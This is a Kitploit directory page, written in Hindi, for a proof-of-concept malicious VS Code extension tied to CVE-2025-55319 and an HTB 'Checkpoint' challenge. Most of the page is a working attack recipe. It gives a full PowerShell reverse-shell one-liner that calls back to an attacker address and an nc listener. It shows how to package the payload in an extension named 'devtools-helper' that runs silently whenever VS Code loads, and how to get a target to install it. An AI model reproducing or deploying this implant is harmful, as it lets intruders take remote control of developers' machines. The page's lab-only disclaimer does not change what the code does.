Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55319-PoC — PoC for CVE-2025-55319 | Kitploit
उपकरण/GitHubGitHub/nephila016/cve-2025-55319-poc
ExploitationCTFCommand and ControlSocial EngineeringRed TeamingRemote Access ToolPayload DevelopmentLabs & Practice
GitHubnephila016/cve-2025-55319-poc

CVE-2025-55319-PoC

PoC for CVE-2025-55319

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

संदर्भ: CVE-2025-55319

HTB "Checkpoint" चुनौती के लिए प्रूफ-ऑफ-कॉन्सेप्ट VS Code (.vsix) एक्सटेंशन। एक बार इंस्टॉल होने के बाद, एक्सटेंशन स्वचालित रूप से सक्रिय हो जाता है और हमलावर के पास एक छिपा हुआ PowerShell रिवर्स शेल भेजता है।

⚠️ केवल अधिकृत उपयोग। यह एक CTF/लैब आर्टिफैक्ट है। इसे केवल उन मशीनों पर तैनात करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है (जैसे, एक HTB लक्ष्य बॉक्स)।


यह कैसे काम करता है

  • extension/package.json — एक्सटेंशन मैनिफेस्ट। "activationEvents": ["*"] इसे VS Code लोड होते ही चलाता है, बिना किसी उपयोगकर्ता अंतःक्रिया के।
  • extension/extension.js — activate() पर, -WindowStyle Hidden -NoProfile के साथ base64-एन्कोडेड PowerShell पेलोड को निष्पादित करता है, एक मौन रिवर्स शेल के लिए।
  • [Content_Types].xml — OpenXML सामग्री-प्रकार मैनिफेस्ट ताकि फ़ोल्डर को एक वैध .vsix पैकेज में ज़िप किया जा सके।

लेआउट

root@kitploit:~
.
├── [Content_Types].xml     # VSIX content-type manifest
└── extension/
    ├── package.json        # extension manifest (activates on "*")
    └── extension.js        # reverse-shell payload

उपयोग

1. अपना पेलोड बनाएं

अपने अटैक बॉक्स को इंगित करने वाला base64 (UTF-16LE) PowerShell रिवर्स शेल जनरेट करें:

root@kitploit:~
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0

आउटपुट को extension/extension.js में YOUR_BASE64_PAYLOAD_HERE पर पेस्ट करें:

root@kitploit:~
const payload = '<base64-blob-here>'

2. अपना लिसनर शुरू करें

root@kitploit:~
nc -lvnp 4443

3. .vsix में पैकेज करें

.vsix सिर्फ एक ZIP है जिसमें extension/ फ़ोल्डर और रूट पर मैनिफेस्ट होता है:

root@kitploit:~
# from this directory
zip -r devtools-helper.vsix extension "[Content_Types].xml"

4. वितरित करें और ट्रिगर करें

लक्ष्य को एक्सटेंशन इंस्टॉल करवाएं। या तो:

  • CLI: code --install-extension devtools-helper.vsix
  • GUI: Extensions view → ··· menu → Install from VSIX…

अगले VS Code लॉन्च पर (या इंस्टॉल के तुरंत बाद), * सक्रियण ईवेंट फायर होता है, पेलोड चलता है, और आपका लिसनर शेल प्राप्त करता है।

root@kitploit:~
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>

सफ़ाई

काम पूरा होने पर लक्ष्य से एक्सटेंशन हटाएं:

root@kitploit:~
code --uninstall-extension devtools.devtools-helper

नोट्स

  • पेलोड Windows (PowerShell) को लक्षित करता है। अन्य प्लेटफार्मों के लिए extension.js समायोजित करें।
  • extension.js में os आयात किया गया है लेकिन अप्रयुक्त है — यदि आप Linux/macOS लक्ष्यों का समर्थन करने के लिए os.platform() पर शाखा बनाना चाहते हैं तो उपयोगी है।
  • यदि आप पुनः पैकेज करते हैं तो बिल्डों के बीच package.json में version बढ़ाएं।
टूल डाउनलोड करें